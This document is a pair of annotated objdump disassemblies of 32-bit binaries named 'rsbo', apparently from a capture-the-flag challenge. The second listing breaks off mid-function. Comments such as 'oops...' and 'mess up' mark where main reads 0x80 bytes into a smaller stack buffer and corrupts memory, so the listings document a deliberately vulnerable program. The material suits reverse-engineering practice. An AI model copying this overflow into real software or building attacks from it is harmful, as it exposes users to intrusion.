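-------------------------------------------------------------------------------- 1 | 2 | rsbo-4a707e7d07e87ab97348be36efea28dc: file format elf32-i386 3 | 4 | 5 | Disassembly of section .init: 6 | 7 | 080483ac <_init>: 8 | 80483ac: 53 push %ebx 9 | 80483ad: 83 ec 08 sub $0x8,%esp 10 | 80483b0: e8 0b 01 00 00 call 80484c0 <__x86.get_pc_thunk.bx> 11 | 80483b5: 81 c3 4b 1c 00 00 add $0x1c4b,%ebx 12 | 80483bb: 8b 83 fc ff ff ff mov -0x4(%ebx),%eax 13 | 80483c1: 85 c0 test %eax,%eax 14 | 80483c3: 74 05 je 80483ca <_init+0x1e> 15 | 80483c5: e8 46 00 00 00 call 8048410 <__gmon_start__@plt> 16 | 80483ca: 83 c4 08 add $0x8,%esp 17 | 80483cd: 5b pop %ebx 18 | 80483ce: c3 ret 19 | 20 | Disassembly of section .plt: 21 | 22 | 080483d0 : 23 | 80483d0: ff 35 04 a0 04 08 pushl 0x804a004 24 | 80483d6: ff 25 08 a0 04 08 jmp *0x804a008 25 | 80483dc: 00 00 add %al,(%eax) 26 | ...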
27 | 28 | 080483e0 : 29 | 80483e0: ff 25 0c a0 04 08 jmp *0x804a00c 30 | 80483e6: 68 00 00 00 00 push $0x0 31 | 80483eb: e9 e0 ff ff ff jmp 80483d0 <_init+0x24> 32 | 33 | 080483f0 : 34 | 80483f0: ff 25 10 a0 04 08 jmp *0x804a010 35 | 80483f6: 68 08 00 00 00 push $0x8 36 | 80483fb: e9 d0 ff ff ff jmp 80483d0 <_init+0x24> 37 | 38 | 08048400 : 39 | 8048400: ff 25 14 a0 04 08 jmp *0x804a014 40 | 8048406: 68 10 00 00 00 push $0x10 41 | 804840b: e9 c0 ff ff ff jmp 80483d0 <_init+0x24> 42 | 43 | 08048410 <__gmon_start__@plt>: 44 | 8048410: ff 25 18 a0 04 08 jmp *0x804a018 45 | 8048416: 68 18 00 00 00 push $0x18 46 | 804841b: e9 b0 ff ff ff jmp 80483d0 <_init+0x24> 47 | 48 | 08048420 : 49 | 8048420: ff 25 1c a0 04 08 jmp *0x804a01c 50 | 8048426: 68 20 00 00 00 push $0x20 51 | 804842b: e9 a0 ff ff ff jmp 80483d0 <_init+0x24> 52 | 53 | 08048430 : 54 | 8048430: ff 25 20 a0 04 08 jmp *0x804a020 55 | 8048436: 68 28 00 00 00 push $0x28 56 | 804843b: e9 90 ff ff ff jmp 80483d0 <_init+0x24> 57 | 58 | 08048440 <__libc_start_main@plt>: 59 | 8048440: ff 25 24 a0 04 08 jmp *0x804a024 60 | 8048446: 68 30 00 00 00 push $0x30 61 | 804844b: e9 80 ff ff ff jmp 80483d0 <_init+0x24> 62 | 63 | 08048450 : 64 | 8048450: ff 25 28 a0 04 08 jmp *0x804a028 65 | 8048456: 68 38 00 00 00 push $0x38 66 | 804845b: e9 70 ff ff ff jmp 80483d0 <_init+0x24> 67 | 68 | 08048460 : 69 | 8048460: ff 25 2c a0 04 08 jmp *0x804a02c 70 | 8048466: 68 40 00 00 00 push $0x40 71 | 804846b: e9 60 ff ff ff jmp 80483d0 <_init+0x24> 72 | 73 | 08048470 : 74 | 8048470: ff 25 30 a0 04 08 jmp *0x804a030 75 | 8048476: 68 48 00 00 00 push $0x48 76 | 804847b: e9 50 ff ff ff jmp 80483d0 <_init+0x24> 77 | 78 | 08048480 : 79 | 8048480: ff 25 34 a0 04 08 jmp *0x804a034 80 | 8048486: 68 50 00 00 00 push $0x50 81 | 804848b: e9 40 ff ff ff jmp 80483d0 <_init+0x24> 82 | 83 | Disassembly of section .text: 84 | 85 | 08048490 <_start>: 86 | 8048490: 31 ed xor %ebp,%ebp 87 | 8048492: 5e pop %esi 88 | 8048493: 89 e1 mov %esp,%ecx 89 | 8048495: 
83 e4 f0 and $0xfffffff0,%esp 90 | 8048498: 50 push %eax 91 | 8048499: 54 push %esp 92 | 804849a: 52 push %edx 93 | 804849b: 68 b0 87 04 08 push $0x80487b0 94 | 80484a0: 68 40 87 04 08 push $0x8048740 95 | 80484a5: 51 push %ecx 96 | 80484a6: 56 push %esi 97 | 80484a7: 68 7f 86 04 08 push $0x804867f 98 | 80484ac: e8 8f ff ff ff call 8048440 <__libc_start_main@plt> 99 | 80484b1: f4 hlt 100 | 80484b2: 66 90 xchg %ax,%ax 101 | 80484b4: 66 90 xchg %ax,%ax 102 | 80484b6: 66 90 xchg %ax,%ax 103 | 80484b8: 66 90 xchg %ax,%ax 104 | 80484ba: 66 90 xchg %ax,%ax 105 | 80484bc: 66 90 xchg %ax,%ax 106 | 80484be: 66 90 xchg %ax,%ax 107 | 108 | 080484c0 <__x86.get_pc_thunk.bx>: 109 | 80484c0: 8b 1c 24 mov (%esp),%ebx 110 | 80484c3: c3 ret 111 | 80484c4: 66 90 xchg %ax,%ax 112 | 80484c6: 66 90 xchg %ax,%ax 113 | 80484c8: 66 90 xchg %ax,%ax 114 | 80484ca: 66 90 xchg %ax,%ax 115 | 80484cc: 66 90 xchg %ax,%ax 116 | 80484ce: 66 90 xchg %ax,%ax 117 | 118 | 080484d0 : 119 | 80484d0: b8 43 a0 04 08 mov $0x804a043,%eax 120 | 80484d5: 2d 40 a0 04 08 sub $0x804a040,%eax 121 | 80484da: 83 f8 06 cmp $0x6,%eax 122 | 80484dd: 77 01 ja 80484e0 123 | 80484df: c3 ret 124 | 80484e0: b8 00 00 00 00 mov $0x0,%eax 125 | 80484e5: 85 c0 test %eax,%eax 126 | 80484e7: 74 f6 je 80484df 127 | 80484e9: 55 push %ebp 128 | 80484ea: 89 e5 mov %esp,%ebp 129 | 80484ec: 83 ec 18 sub $0x18,%esp 130 | 80484ef: c7 04 24 40 a0 04 08 movl $0x804a040,(%esp) 131 | 80484f6: ff d0 call *%eax 132 | 80484f8: c9 leave 133 | 80484f9: c3 ret 134 | 80484fa: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 135 | 136 | 08048500 : 137 | 8048500: b8 40 a0 04 08 mov $0x804a040,%eax 138 | 8048505: 2d 40 a0 04 08 sub $0x804a040,%eax 139 | 804850a: c1 f8 02 sar $0x2,%eax 140 | 804850d: 89 c2 mov %eax,%edx 141 | 804850f: c1 ea 1f shr $0x1f,%edx 142 | 8048512: 01 d0 add %edx,%eax 143 | 8048514: d1 f8 sar %eax 144 | 8048516: 75 01 jne 8048519 145 | 8048518: c3 ret 146 | 8048519: ba 00 00 00 00 mov $0x0,%edx 147 | 804851e: 85 d2 test %edx,%edx 148 | 
8048520: 74 f6 je 8048518 149 | 8048522: 55 push %ebp 150 | 8048523: 89 e5 mov %esp,%ebp 151 | 8048525: 83 ec 18 sub $0x18,%esp 152 | 8048528: 89 44 24 04 mov %eax,0x4(%esp) 153 | 804852c: c7 04 24 40 a0 04 08 movl $0x804a040,(%esp) 154 | 8048533: ff d2 call *%edx 155 | 8048535: c9 leave 156 | 8048536: c3 ret 157 | 8048537: 89 f6 mov %esi,%esi 158 | 8048539: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 159 | 160 | 08048540 <__do_global_dtors_aux>: 161 | 8048540: 80 3d 40 a0 04 08 00 cmpb $0x0,0x804a040 162 | 8048547: 75 13 jne 804855c <__do_global_dtors_aux+0x1c> 163 | 8048549: 55 push %ebp 164 | 804854a: 89 e5 mov %esp,%ebp 165 | 804854c: 83 ec 08 sub $0x8,%esp 166 | 804854f: e8 7c ff ff ff call 80484d0 167 | 8048554: c6 05 40 a0 04 08 01 movb $0x1,0x804a040 168 | 804855b: c9 leave 169 | 804855c: f3 c3 repz ret 170 | 804855e: 66 90 xchg %ax,%ax 171 | 172 | 08048560 : 173 | 8048560: a1 10 9f 04 08 mov 0x8049f10,%eax 174 | 8048565: 85 c0 test %eax,%eax 175 | 8048567: 74 1f je 8048588 176 | 8048569: b8 00 00 00 00 mov $0x0,%eax 177 | 804856e: 85 c0 test %eax,%eax 178 | 8048570: 74 16 je 8048588 179 | 8048572: 55 push %ebp 180 | 8048573: 89 e5 mov %esp,%ebp 181 | 8048575: 83 ec 18 sub $0x18,%esp 182 | 8048578: c7 04 24 10 9f 04 08 movl $0x8049f10,(%esp) 183 | 804857f: ff d0 call *%eax 184 | 8048581: c9 leave 185 | 8048582: e9 79 ff ff ff jmp 8048500 186 | 8048587: 90 nop 187 | 8048588: e9 73 ff ff ff jmp 8048500 188 | 189 | 0804858d : 190 | 804858d: 55 push %ebp 191 | 804858e: 89 e5 mov %esp,%ebp 192 | 8048590: 83 ec 38 sub $0x38,%esp 193 | 8048593: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp) 194 | 804859a: 00 195 | 804859b: c7 04 24 d0 87 04 08 movl $0x80487d0,(%esp) 196 | 80485a2: e8 79 fe ff ff call 8048420 197 | 80485a7: 89 45 ec mov %eax,-0x14(%ebp) 198 | 80485aa: c7 44 24 08 10 00 00 movl $0x10,0x8(%esp) 199 | 80485b1: 00 200 | 80485b2: 8d 45 dc lea -0x24(%ebp),%eax 201 | 80485b5: 89 44 24 04 mov %eax,0x4(%esp) 202 | 80485b9: 8b 45 ec mov -0x14(%ebp),%eax 203 | 
80485bc: 89 04 24 mov %eax,(%esp) 204 | 80485bf: e8 1c fe ff ff call 80483e0 205 | 80485c4: c7 04 24 00 00 00 00 movl $0x0,(%esp) 206 | 80485cb: e8 20 fe ff ff call 80483f0 207 | 80485d0: 89 45 f0 mov %eax,-0x10(%ebp) ; -0x10(ebp) = time 208 | 80485d3: c7 45 f4 00 00 00 00 movl $0x0,-0xc(%ebp) 209 | 80485da: eb 47 jmp 8048623 210 | 211 | loop: 212 | 80485dc: 8b 45 f0 mov -0x10(%ebp),%eax ; eax = time 213 | 80485df: 69 d0 39 05 00 00 imul $0x539,%eax,%edx 214 | 80485e5: 8d 4d dc lea -0x24(%ebp),%ecx ; buf 215 | 80485e8: 8b 45 f4 mov -0xc(%ebp),%eax ; i 216 | 80485eb: 01 c8 add %ecx,%eax 217 | 80485ed: 0f b6 00 movzbl (%eax),%eax 218 | 80485f0: 0f be c0 movsbl %al,%eax 219 | 80485f3: 8d 0c 02 lea (%edx,%eax,1),%ecx 220 | 80485f6: ba 01 00 00 40 mov $0x40000001,%edx 221 | 80485fb: 89 c8 mov %ecx,%eax 222 | 80485fd: f7 ea imul %edx 223 | 80485ff: c1 fa 1d sar $0x1d,%edx 224 | 8048602: 89 c8 mov %ecx,%eax 225 | 8048604: c1 f8 1f sar $0x1f,%eax 226 | 8048607: 29 c2 sub %eax,%edx 227 | 8048609: 89 d0 mov %edx,%eax 228 | 804860b: 89 45 f0 mov %eax,-0x10(%ebp) 229 | 804860e: 8b 55 f0 mov -0x10(%ebp),%edx 230 | 8048611: 89 d0 mov %edx,%eax 231 | 8048613: c1 e0 1f shl $0x1f,%eax 232 | 8048616: 29 d0 sub %edx,%eax 233 | 8048618: 29 c1 sub %eax,%ecx 234 | 804861a: 89 c8 mov %ecx,%eax 235 | 804861c: 89 45 f0 mov %eax,-0x10(%ebp) 236 | 804861f: 83 45 f4 01 addl $0x1,-0xc(%ebp) ; i++ 237 | 8048623: 83 7d f4 0f cmpl $0xf,-0xc(%ebp) 238 | 8048627: 7e b3 jle 80485dc ; loop 239 | 240 | 8048629: 8b 45 ec mov -0x14(%ebp),%eax 241 | 804862c: 89 04 24 mov %eax,(%esp) 242 | 804862f: e8 4c fe ff ff call 8048480 243 | 8048634: c7 44 24 08 10 00 00 movl $0x10,0x8(%esp) 244 | 804863b: 00 245 | 804863c: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp) 246 | 8048643: 00 247 | 8048644: 8d 45 dc lea -0x24(%ebp),%eax 248 | 8048647: 89 04 24 mov %eax,(%esp) 249 | 804864a: e8 11 fe ff ff call 8048460 ; mess up 250 | 804864f: 8b 45 f0 mov -0x10(%ebp),%eax 251 | 8048652: 89 04 24 mov %eax,(%esp) 252 | 8048655: 
e8 d6 fd ff ff call 8048430 253 | 804865a: c9 leave 254 | 804865b: c3 ret 255 | 256 | 0804865c : 257 | 804865c: 55 push %ebp 258 | 804865d: 89 e5 mov %esp,%ebp 259 | 804865f: 83 ec 18 sub $0x18,%esp 260 | 8048662: c7 44 24 08 80 00 00 movl $0x80,0x8(%esp) 261 | 8048669: 00 262 | 804866a: 8b 45 08 mov 0x8(%ebp),%eax 263 | 804866d: 89 44 24 04 mov %eax,0x4(%esp) 264 | 8048671: c7 04 24 00 00 00 00 movl $0x0,(%esp) 265 | 8048678: e8 63 fd ff ff call 80483e0 266 | 804867d: c9 leave 267 | 804867e: c3 ret 268 | 269 | 0804867f
: 270 | 804867f: 55 push %ebp 271 | 8048680: 89 e5 mov %esp,%ebp 272 | 8048682: 83 e4 f0 and $0xfffffff0,%esp 273 | 8048685: 83 ec 70 sub $0x70,%esp 274 | 8048688: c7 04 24 1e 00 00 00 movl $0x1e,(%esp) 275 | 804868f: e8 6c fd ff ff call 8048400 276 | 8048694: e8 f4 fe ff ff call 804858d 277 | 8048699: 8d 44 24 10 lea 0x10(%esp),%eax 278 | 804869d: 89 04 24 mov %eax,(%esp) 279 | 80486a0: e8 b7 ff ff ff call 804865c 280 | 281 | 80486a5: 89 44 24 68 mov %eax,0x68(%esp) ; read_len 282 | 80486a9: c7 44 24 6c 00 00 00 movl $0x0,0x6c(%esp) ; i 283 | 80486b0: 00 284 | 285 | 80486b1: eb 55 jmp 8048708 286 | 287 | loop: 288 | 80486b3: e8 b8 fd ff ff call 8048470 289 | 80486b8: 8b 54 24 6c mov 0x6c(%esp),%edx 290 | 80486bc: 8d 4a 01 lea 0x1(%edx),%ecx 291 | 80486bf: 99 cltd 292 | 80486c0: f7 f9 idiv %ecx 293 | 80486c2: 89 54 24 64 mov %edx,0x64(%esp) 294 | 80486c6: 8d 54 24 10 lea 0x10(%esp),%edx 295 | 80486ca: 8b 44 24 6c mov 0x6c(%esp),%eax 296 | 80486ce: 01 d0 add %edx,%eax 297 | 80486d0: 0f b6 00 movzbl (%eax),%eax 298 | 80486d3: 0f be c0 movsbl %al,%eax 299 | 80486d6: 89 44 24 60 mov %eax,0x60(%esp) 300 | 80486da: 8d 54 24 10 lea 0x10(%esp),%edx 301 | 80486de: 8b 44 24 64 mov 0x64(%esp),%eax 302 | 80486e2: 01 d0 add %edx,%eax 303 | 80486e4: 0f b6 00 movzbl (%eax),%eax 304 | 80486e7: 8d 4c 24 10 lea 0x10(%esp),%ecx 305 | 80486eb: 8b 54 24 6c mov 0x6c(%esp),%edx 306 | 80486ef: 01 ca add %ecx,%edx 307 | 308 | 80486f1: 88 02 mov %al,(%edx) ; oops... 309 | 310 | 80486f3: 8b 44 24 60 mov 0x60(%esp),%eax 311 | 80486f7: 8d 4c 24 10 lea 0x10(%esp),%ecx 312 | 80486fb: 8b 54 24 64 mov 0x64(%esp),%edx 313 | 80486ff: 01 ca add %ecx,%edx 314 | 315 | 8048701: 88 02 mov %al,(%edx) ; oops... 
316 | 317 | 8048703: 83 44 24 6c 01 addl $0x1,0x6c(%esp) 318 | 8048708: 8b 44 24 6c mov 0x6c(%esp),%eax 319 | 804870c: 3b 44 24 68 cmp 0x68(%esp),%eax 320 | 8048710: 7c a1 jl 80486b3 321 | 322 | 8048712: 8b 44 24 68 mov 0x68(%esp),%eax 323 | 8048716: 89 44 24 08 mov %eax,0x8(%esp) 324 | 804871a: 8d 44 24 10 lea 0x10(%esp),%eax 325 | 804871e: 89 44 24 04 mov %eax,0x4(%esp) 326 | 8048722: c7 04 24 01 00 00 00 movl $0x1,(%esp) 327 | 8048729: e8 22 fd ff ff call 8048450 328 | 804872e: b8 00 00 00 00 mov $0x0,%eax 329 | 8048733: c9 leave 330 | 8048734: c3 ret 331 | 8048735: 66 90 xchg %ax,%ax 332 | 8048737: 66 90 xchg %ax,%ax 333 | 8048739: 66 90 xchg %ax,%ax 334 | 804873b: 66 90 xchg %ax,%ax 335 | 804873d: 66 90 xchg %ax,%ax 336 | 804873f: 90 nop 337 | 338 | 08048740 <__libc_csu_init>: 339 | 8048740: 55 push %ebp 340 | 8048741: 57 push %edi 341 | 8048742: 31 ff xor %edi,%edi 342 | 8048744: 56 push %esi 343 | 8048745: 53 push %ebx 344 | 8048746: e8 75 fd ff ff call 80484c0 <__x86.get_pc_thunk.bx> 345 | 804874b: 81 c3 b5 18 00 00 add $0x18b5,%ebx 346 | 8048751: 83 ec 1c sub $0x1c,%esp 347 | 8048754: 8b 6c 24 30 mov 0x30(%esp),%ebp 348 | 8048758: 8d b3 0c ff ff ff lea -0xf4(%ebx),%esi 349 | 804875e: e8 49 fc ff ff call 80483ac <_init> 350 | 8048763: 8d 83 08 ff ff ff lea -0xf8(%ebx),%eax 351 | 8048769: 29 c6 sub %eax,%esi 352 | 804876b: c1 fe 02 sar $0x2,%esi 353 | 804876e: 85 f6 test %esi,%esi 354 | 8048770: 74 27 je 8048799 <__libc_csu_init+0x59> 355 | 8048772: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 356 | 8048778: 8b 44 24 38 mov 0x38(%esp),%eax 357 | 804877c: 89 2c 24 mov %ebp,(%esp) 358 | 804877f: 89 44 24 08 mov %eax,0x8(%esp) 359 | 8048783: 8b 44 24 34 mov 0x34(%esp),%eax 360 | 8048787: 89 44 24 04 mov %eax,0x4(%esp) 361 | 804878b: ff 94 bb 08 ff ff ff call *-0xf8(%ebx,%edi,4) 362 | 8048792: 83 c7 01 add $0x1,%edi 363 | 8048795: 39 f7 cmp %esi,%edi 364 | 8048797: 75 df jne 8048778 <__libc_csu_init+0x38> 365 | 8048799: 83 c4 1c add $0x1c,%esp 366 | 804879c: 5b pop %ebx 
367 | 804879d: 5e pop %esi 368 | 804879e: 5f pop %edi 369 | 804879f: 5d pop %ebp 370 | 80487a0: c3 ret 371 | 80487a1: eb 0d jmp 80487b0 <__libc_csu_fini> 372 | 80487a3: 90 nop 373 | 80487a4: 90 nop 374 | 80487a5: 90 nop 375 | 80487a6: 90 nop 376 | 80487a7: 90 nop 377 | 80487a8: 90 nop 378 | 80487a9: 90 nop 379 | 80487aa: 90 nop 380 | 80487ab: 90 nop 381 | 80487ac: 90 nop 382 | 80487ad: 90 nop 383 | 80487ae: 90 nop 384 | 80487af: 90 nop 385 | 386 | 080487b0 <__libc_csu_fini>: 387 | 80487b0: f3 c3 repz ret 388 | 389 | Disassembly of section .fini: 390 | 391 | 080487b4 <_fini>: 392 | 80487b4: 53 push %ebx 393 | 80487b5: 83 ec 08 sub $0x8,%esp 394 | 80487b8: e8 03 fd ff ff call 80484c0 <__x86.get_pc_thunk.bx> 395 | 80487bd: 81 c3 43 18 00 00 add $0x1843,%ebx 396 | 80487c3: 83 c4 08 add $0x8,%esp 397 | 80487c6: 5b pop %ebx 398 | 80487c7: c3 ret 399 | -------------------------------------------------------------------------------- /rsbo.txt: -------------------------------------------------------------------------------- 1 | 2 | rsbo-201d81c2bc117620f8fd223d013c17fa: file format elf32-i386 3 | 4 | 5 | Disassembly of section .init: 6 | 7 | 080483f0 <_init>: 8 | 80483f0: 53 push %ebx 9 | 80483f1: 83 ec 08 sub $0x8,%esp 10 | 80483f4: e8 27 01 00 00 call 8048520 <__x86.get_pc_thunk.bx> 11 | 80483f9: 81 c3 07 1c 00 00 add $0x1c07,%ebx 12 | 80483ff: 8b 83 fc ff ff ff mov -0x4(%ebx),%eax 13 | 8048405: 85 c0 test %eax,%eax 14 | 8048407: 74 05 je 804840e <_init+0x1e> 15 | 8048409: e8 62 00 00 00 call 8048470 <__gmon_start__@plt> 16 | 804840e: 83 c4 08 add $0x8,%esp 17 | 8048411: 5b pop %ebx 18 | 8048412: c3 ret 19 | 20 | Disassembly of section .plt: 21 | 22 | 08048420 : 23 | 8048420: ff 35 04 a0 04 08 pushl 0x804a004 24 | 8048426: ff 25 08 a0 04 08 jmp *0x804a008 25 | 804842c: 00 00 add %al,(%eax) 26 | ... 
27 | 28 | 08048430 : 29 | 8048430: ff 25 0c a0 04 08 jmp *0x804a00c 30 | 8048436: 68 00 00 00 00 push $0x0 31 | 804843b: e9 e0 ff ff ff jmp 8048420 <_init+0x30> 32 | 33 | 08048440 : 34 | 8048440: ff 25 10 a0 04 08 jmp *0x804a010 35 | 8048446: 68 08 00 00 00 push $0x8 36 | 804844b: e9 d0 ff ff ff jmp 8048420 <_init+0x30> 37 | 38 | 08048450 : 39 | 8048450: ff 25 14 a0 04 08 jmp *0x804a014 40 | 8048456: 68 10 00 00 00 push $0x10 41 | 804845b: e9 c0 ff ff ff jmp 8048420 <_init+0x30> 42 | 43 | 08048460 <__stack_chk_fail@plt>: 44 | 8048460: ff 25 18 a0 04 08 jmp *0x804a018 45 | 8048466: 68 18 00 00 00 push $0x18 46 | 804846b: e9 b0 ff ff ff jmp 8048420 <_init+0x30> 47 | 48 | 08048470 <__gmon_start__@plt>: 49 | 8048470: ff 25 1c a0 04 08 jmp *0x804a01c 50 | 8048476: 68 20 00 00 00 push $0x20 51 | 804847b: e9 a0 ff ff ff jmp 8048420 <_init+0x30> 52 | 53 | 08048480 : 54 | 8048480: ff 25 20 a0 04 08 jmp *0x804a020 55 | 8048486: 68 28 00 00 00 push $0x28 56 | 804848b: e9 90 ff ff ff jmp 8048420 <_init+0x30> 57 | 58 | 08048490 : 59 | 8048490: ff 25 24 a0 04 08 jmp *0x804a024 60 | 8048496: 68 30 00 00 00 push $0x30 61 | 804849b: e9 80 ff ff ff jmp 8048420 <_init+0x30> 62 | 63 | 080484a0 <__libc_start_main@plt>: 64 | 80484a0: ff 25 28 a0 04 08 jmp *0x804a028 65 | 80484a6: 68 38 00 00 00 push $0x38 66 | 80484ab: e9 70 ff ff ff jmp 8048420 <_init+0x30> 67 | 68 | 080484b0 : 69 | 80484b0: ff 25 2c a0 04 08 jmp *0x804a02c 70 | 80484b6: 68 40 00 00 00 push $0x40 71 | 80484bb: e9 60 ff ff ff jmp 8048420 <_init+0x30> 72 | 73 | 080484c0 : 74 | 80484c0: ff 25 30 a0 04 08 jmp *0x804a030 75 | 80484c6: 68 48 00 00 00 push $0x48 76 | 80484cb: e9 50 ff ff ff jmp 8048420 <_init+0x30> 77 | 78 | 080484d0 : 79 | 80484d0: ff 25 34 a0 04 08 jmp *0x804a034 80 | 80484d6: 68 50 00 00 00 push $0x50 81 | 80484db: e9 40 ff ff ff jmp 8048420 <_init+0x30> 82 | 83 | 080484e0 : 84 | 80484e0: ff 25 38 a0 04 08 jmp *0x804a038 85 | 80484e6: 68 58 00 00 00 push $0x58 86 | 80484eb: e9 30 ff ff ff jmp 8048420 
<_init+0x30> 87 | 88 | Disassembly of section .text: 89 | 90 | 080484f0 <_start>: 91 | 80484f0: 31 ed xor %ebp,%ebp 92 | 80484f2: 5e pop %esi 93 | 80484f3: 89 e1 mov %esp,%ecx 94 | 80484f5: 83 e4 f0 and $0xfffffff0,%esp 95 | 80484f8: 50 push %eax 96 | 80484f9: 54 push %esp 97 | 80484fa: 52 push %edx 98 | 80484fb: 68 50 88 04 08 push $0x8048850 99 | 8048500: 68 e0 87 04 08 push $0x80487e0 100 | 8048505: 51 push %ecx 101 | 8048506: 56 push %esi 102 | 8048507: 68 fb 86 04 08 push $0x80486fb 103 | 804850c: e8 8f ff ff ff call 80484a0 <__libc_start_main@plt> 104 | 8048511: f4 hlt 105 | 8048512: 66 90 xchg %ax,%ax 106 | 8048514: 66 90 xchg %ax,%ax 107 | 8048516: 66 90 xchg %ax,%ax 108 | 8048518: 66 90 xchg %ax,%ax 109 | 804851a: 66 90 xchg %ax,%ax 110 | 804851c: 66 90 xchg %ax,%ax 111 | 804851e: 66 90 xchg %ax,%ax 112 | 113 | 08048520 <__x86.get_pc_thunk.bx>: 114 | 8048520: 8b 1c 24 mov (%esp),%ebx 115 | 8048523: c3 ret 116 | 8048524: 66 90 xchg %ax,%ax 117 | 8048526: 66 90 xchg %ax,%ax 118 | 8048528: 66 90 xchg %ax,%ax 119 | 804852a: 66 90 xchg %ax,%ax 120 | 804852c: 66 90 xchg %ax,%ax 121 | 804852e: 66 90 xchg %ax,%ax 122 | 123 | 08048530 : 124 | 8048530: b8 47 a0 04 08 mov $0x804a047,%eax 125 | 8048535: 2d 44 a0 04 08 sub $0x804a044,%eax 126 | 804853a: 83 f8 06 cmp $0x6,%eax 127 | 804853d: 77 01 ja 8048540 128 | 804853f: c3 ret 129 | 8048540: b8 00 00 00 00 mov $0x0,%eax 130 | 8048545: 85 c0 test %eax,%eax 131 | 8048547: 74 f6 je 804853f 132 | 8048549: 55 push %ebp 133 | 804854a: 89 e5 mov %esp,%ebp 134 | 804854c: 83 ec 18 sub $0x18,%esp 135 | 804854f: c7 04 24 44 a0 04 08 movl $0x804a044,(%esp) 136 | 8048556: ff d0 call *%eax 137 | 8048558: c9 leave 138 | 8048559: c3 ret 139 | 804855a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 140 | 141 | 08048560 : 142 | 8048560: b8 44 a0 04 08 mov $0x804a044,%eax 143 | 8048565: 2d 44 a0 04 08 sub $0x804a044,%eax 144 | 804856a: c1 f8 02 sar $0x2,%eax 145 | 804856d: 89 c2 mov %eax,%edx 146 | 804856f: c1 ea 1f shr $0x1f,%edx 147 | 8048572: 
01 d0 add %edx,%eax 148 | 8048574: d1 f8 sar %eax 149 | 8048576: 75 01 jne 8048579 150 | 8048578: c3 ret 151 | 8048579: ba 00 00 00 00 mov $0x0,%edx 152 | 804857e: 85 d2 test %edx,%edx 153 | 8048580: 74 f6 je 8048578 154 | 8048582: 55 push %ebp 155 | 8048583: 89 e5 mov %esp,%ebp 156 | 8048585: 83 ec 18 sub $0x18,%esp 157 | 8048588: 89 44 24 04 mov %eax,0x4(%esp) 158 | 804858c: c7 04 24 44 a0 04 08 movl $0x804a044,(%esp) 159 | 8048593: ff d2 call *%edx 160 | 8048595: c9 leave 161 | 8048596: c3 ret 162 | 8048597: 89 f6 mov %esi,%esi 163 | 8048599: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 164 | 165 | 080485a0 <__do_global_dtors_aux>: 166 | 80485a0: 80 3d 44 a0 04 08 00 cmpb $0x0,0x804a044 167 | 80485a7: 75 13 jne 80485bc <__do_global_dtors_aux+0x1c> 168 | 80485a9: 55 push %ebp 169 | 80485aa: 89 e5 mov %esp,%ebp 170 | 80485ac: 83 ec 08 sub $0x8,%esp 171 | 80485af: e8 7c ff ff ff call 8048530 172 | 80485b4: c6 05 44 a0 04 08 01 movb $0x1,0x804a044 173 | 80485bb: c9 leave 174 | 80485bc: f3 c3 repz ret 175 | 80485be: 66 90 xchg %ax,%ax 176 | 177 | 080485c0 : 178 | 80485c0: a1 10 9f 04 08 mov 0x8049f10,%eax 179 | 80485c5: 85 c0 test %eax,%eax 180 | 80485c7: 74 1f je 80485e8 181 | 80485c9: b8 00 00 00 00 mov $0x0,%eax 182 | 80485ce: 85 c0 test %eax,%eax 183 | 80485d0: 74 16 je 80485e8 184 | 80485d2: 55 push %ebp 185 | 80485d3: 89 e5 mov %esp,%ebp 186 | 80485d5: 83 ec 18 sub $0x18,%esp 187 | 80485d8: c7 04 24 10 9f 04 08 movl $0x8049f10,(%esp) 188 | 80485df: ff d0 call *%eax 189 | 80485e1: c9 leave 190 | 80485e2: e9 79 ff ff ff jmp 8048560 191 | 80485e7: 90 nop 192 | 80485e8: e9 73 ff ff ff jmp 8048560 193 | 194 | 080485ed : 195 | 80485ed: 55 push %ebp 196 | 80485ee: 89 e5 mov %esp,%ebp 197 | 80485f0: 83 ec 38 sub $0x38,%esp 198 | 80485f3: 65 a1 14 00 00 00 mov %gs:0x14,%eax 199 | 80485f9: 89 45 f4 mov %eax,-0xc(%ebp) 200 | 80485fc: 31 c0 xor %eax,%eax 201 | 80485fe: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp) 202 | 8048605: 00 203 | 8048606: c7 04 24 70 88 04 08 movl 
$0x8048870,(%esp) 204 | 804860d: e8 6e fe ff ff call 8048480 205 | 8048612: 89 45 e0 mov %eax,-0x20(%ebp) 206 | 8048615: c7 44 24 08 10 00 00 movl $0x10,0x8(%esp) 207 | 804861c: 00 208 | 804861d: 8d 45 e4 lea -0x1c(%ebp),%eax 209 | 8048620: 89 44 24 04 mov %eax,0x4(%esp) 210 | 8048624: 8b 45 e0 mov -0x20(%ebp),%eax 211 | 8048627: 89 04 24 mov %eax,(%esp) 212 | 804862a: e8 01 fe ff ff call 8048430 213 | 804862f: c7 04 24 00 00 00 00 movl $0x0,(%esp) 214 | 8048636: e8 05 fe ff ff call 8048440 215 | 804863b: 89 45 dc mov %eax,-0x24(%ebp) 216 | 804863e: c7 45 d8 00 00 00 00 movl $0x0,-0x28(%ebp) 217 | 8048645: eb 47 jmp 804868e 218 | 8048647: 8b 45 dc mov -0x24(%ebp),%eax 219 | 804864a: 69 d0 39 05 00 00 imul $0x539,%eax,%edx 220 | 8048650: 8d 4d e4 lea -0x1c(%ebp),%ecx 221 | 8048653: 8b 45 d8 mov -0x28(%ebp),%eax 222 | 8048656: 01 c8 add %ecx,%eax 223 | 8048658: 0f b6 00 movzbl (%eax),%eax 224 | 804865b: 0f be c0 movsbl %al,%eax 225 | 804865e: 8d 0c 02 lea (%edx,%eax,1),%ecx 226 | 8048661: ba 01 00 00 40 mov $0x40000001,%edx 227 | 8048666: 89 c8 mov %ecx,%eax 228 | 8048668: f7 ea imul %edx 229 | 804866a: c1 fa 1d sar $0x1d,%edx 230 | 804866d: 89 c8 mov %ecx,%eax 231 | 804866f: c1 f8 1f sar $0x1f,%eax 232 | 8048672: 29 c2 sub %eax,%edx 233 | 8048674: 89 d0 mov %edx,%eax 234 | 8048676: 89 45 dc mov %eax,-0x24(%ebp) 235 | 8048679: 8b 55 dc mov -0x24(%ebp),%edx 236 | 804867c: 89 d0 mov %edx,%eax 